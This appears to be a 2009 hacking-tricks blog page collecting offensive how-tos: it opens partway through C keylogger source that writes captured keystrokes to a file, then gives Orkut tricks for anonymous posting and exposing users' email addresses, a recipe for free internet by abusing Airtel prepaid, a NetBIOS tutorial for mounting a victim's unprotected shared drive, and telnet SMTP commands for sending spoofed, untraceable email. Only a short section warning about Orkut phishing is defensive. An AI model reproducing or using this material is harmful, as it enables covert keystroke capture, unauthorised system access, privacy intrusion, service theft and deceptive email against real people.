fprintf(pfile,”%s”,”[CTRL]“);
if (key==VK_PAUSE)
fprintf(pfile,”%s”,”[PAUSE]“);
if (key==VK_ESCAPE)
fprintf(pfile,”%s”,”[ESC]“);
if (key==VK_END)
fprintf(pfile,”%s”,”[END]“);
if (key==VK_HOME)
fprintf(pfile,”%s”,”[HOME]“);
if (key==VK_LEFT)
fprintf(pfile,”%s”,”[LEFT]“);
if (key==VK_UP)
fprintf(pfile,”%s”,”[UP]“);
if (key==VK_RIGHT)
fprintf(pfile,”%s”,”[RIGHT]“);
if (key==VK_DOWN)
fprintf(pfile,”%s”,”[DOWN]“);
if (key==VK_SNAPSHOT)
fprintf(pfile,”%s”,”[PRINT]“);
if (key==VK_NUMLOCK)
fprintf(pfile,”%s”,”[NUM LOCK]“);
if (key==190 || key==110)
fprintf(pfile,”%s”,”.”);

if (key >=96 && key <= 105)
{
key -= 48;
fprintf(pfile,”%s”,&key);
}
if (key >=48 && key <= 59)
fprintf(pfile,”%s”,&key);
if (key !=VK_LBUTTON || key !=VK_RBUTTON)
{
if (key >=65 && key <=90)
{
if (GetKeyState(VK_CAPITAL))
fprintf(pfile,”%s”,&key);
else
{
key = key +32;
fprintf(pfile,”%s”,&key);

}
}
}
fclose(pfile);
}
The virtual key code table -> google. Compiled with MS VC++ 6.0.
bugs:

Writing text in reverse order

# Type the text in the scrapbook or any text box.
# Type & # 8 2 3 8 without spaces before the message in the text box.
# Example: "‮ This is message reverted."
# Press SUBMIT.
# The above message appears as -
‮ This is message reverted

Write Anonymous scraps

# Create a fake account.
# Write the scraps to the person you want.
# Delete the account.
# Your scraps from the deleted account becomes anonymous

Knowing Email ID of any profile on Orkut

# Ignore the person of whom you want to know the Email id.
# Open your Gtalk of the same account as Orkut.
# Go to Settings -> Blocked
# You can see the ignored person's email id.

Infromation on How your orkut Account gets Hacked, or How you can save your orkut account

Google uses a 4 Level Orkut login which makes it difficult to hack using brute force method.

1st Level Security-SSL or 128 bit secured connection
2nd Level Google account checks for cookie in the sytem of user
3rd Level Google provides a redirection to the entered User information
4th Level Google doesn't use conventional php/aspx/asp coding so impossible to attack using input validation attack!!

It is not an easy task to break this security! But still some people manages to get access to other accounts. The question concerned is How they do it? Many of them just use simple tricks that be fool users and then they themselves leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!

Phishing Attack is the most popular way of stealing other's password. Popular by the name of fake login (among those who knows it!!) the users land on a page where they are asked for their login information and they enter their username and password thinking it to be a real page but actually it is other way round. It submits all the details entered to the programmer or the coder.

Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. Clicking on this link will take you to a fake login page and there you loose up your password.

Orkut New Features: I have come across a page that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When user submit the page, there goes his ID and password mailed to the coder.

Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.

Primary mail address: If by some means a hacker came to know password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on 'forget password'.This way Google will send link to the already hacked primary email id to change the password of the Orkut account. Hence the email hacker will change your Orkut account's password. Hence your Orkut account hacked too.
So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on 'Forgot password' the password changing link goes to an unknown email id i.e. not known to the hacker.
Hence your Orkut account saved.

Friday, April 3, 2009

Free internet connectivity for pc or laptop through AIRTEL prepaid

Here is a hacking trick to connect to the internet with airtel prepaid free

You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT

Netbios Tutorial

Here is a common hacking techniques used by some hacker ..



This is for educational purpose only, this hack works with unpatched version of Windows 2000/NT/XP. (only works if the shared drive that has no password set by administrator)



Step 1:

-Get a IP (range) scanner.

-Scan the victim's ip on TCP/IP port 1XX (i put some XX in the port number so as di cya magaya for actual testing)



Most port scanners (nmap being the most prominent example) correctly

report ports as either open, closed or filtered.

"Mahirap" o hard to find some open port open these days because of firewall (sa patched windows)enable that will either "filtered or closed" ang port if u used ip scanner..



What is filtered or closed port?

Use an analogy of the cops coming to your place and looking for you. Having a filtered port is like them knocking on the door, and you saying "I'm not here". Having a closed port is like them knocking on the door, and no one answering. With a filtered port, you know there is an active system behind that port.

As far as from a security standpoint, to most hackers, when they see closed they don't think of a firewall, they think the service is just not running. When I see filtered, and its a port I want to get to, I instantly think, oh, ok, is there some backdoor I can punch thru the firewall? Can I DOS the firewall? Can I remotely administer the firewall?



Step 1.1

-Open a dos prompt

-Do this by going to start/run

-Type cmd

When you are already in DOS command prompt type

-NMAP -v -p 159 77.106.2.1-110 (example target ip range)

-when you got an open port proceed to step 2



Step 2

This is what you need to type down:

Replace 255.255.255.255 with the victims IP address.



c:\windows>nbtstat -a 255.255.255.255



If you see this your in:

Step 3

type down:



c:\windows>net view \\255.255.255. 255







Step 4

type down:

c:\windows>net use x: \\255.255.255. 255\SYSVOL

(you can replace x: by anything letter you want but not your own drive

letters.)



Note:SYSVOL is the name of the shared harddrive.



If the command is successful we will get the confirmation.



The command was completed successfullly.



Bingo your inside the system now..



You can now execute any dos command e.g. x:\dir

(you will experience a lag in the system since it is a remote computer)



Now open windows explorer or just double click on the My Computer icon

on your desktop and you will see a new network drive X:\> . Now your are a

hacker.

This tutorial is warning for those who have old OS like unpatched XP,NT,2000..always protect ur system..upgrade ur o system.. ..protect your port specially port 139..Remember Hacking other`s comp is stealing..

How to send Anonymous Email

Sometimes you may need to send an email anonymously.

There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also will not allow you to use a proxy and utilize their service. This is for security reasons.

My definition of anonymous includes the email addresses appearing as if they have been sent from whatever address you specify as well as no accurate record of your IP in the headers of the mail that could be traced back to you.

The method that follows supports my definition of anonymous.

Amazingly, all you need to accomplish this is telnet and a SMTP server. Allow me to break it down.

Telnet is a software application that connects one machine to another, allowing you to log on to that other machine as a user.

If you don't have telnet, you can easily download it for free from the web - do a search on "telnet" or "download telnet” in any search engine.

...and just for the sake of being thorough...

What is SMTP?
SMTP stands for "Simple Mail Transfer Protocol"
Basically just a protocol for sending e-mail.

Where do you get a SMTP server?
Heres a few links, but as always be aware that these sites may not be here forever or their content may change. Searching for "SMTP servers" or "SMTP server list" should produce effective results.

http://www.gr0w.com/help/email_help_smtp_servers.htm
http://www.uic.edu/depts/accc/ecomm/smtpmove/isps.html
http://www.thebestfree.net/free/freesmtp.htm
http://www.registerdirect.co.nz/help/smtp_servers.html
http://www.bu.edu/pcsc/email/remote/smtplist.html

Once you've selected a server, open the command prompt, and type:
telnet xxxxxx.com 25

(Obviously replace the x's with the SMTP server you've selected) now type the following:

HELO targetsmailserver.com
MAIL FROM: whoever@whatever.com
RCPT TO: target@address.com
DATA
from: whoever@whatever.com
to: target@address.com
subject: whatever
received: xxx.xxx.xxx.xxx
x-header: xxx.xxx.xxx.xxx
The body of the message goes here
.

*Note 1: Remember to end with "." on a line by itself as directed.

*Note 2: Adding x-header and received allows you to alter the IP information found in the headers of the mail, making it untracable and totally anonymous**

*Note 3: There are ISPs that have port 25 (SMTP) blocked. Be sure your settings and ISP allow connections to port 25. If all else fails, get the SMTP sever address from your ISP

Related Posts with Thumbnails
When reproducing our materials in whole or in part, hyperlink to the articles should be strictly made Creative Commons License This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 India License.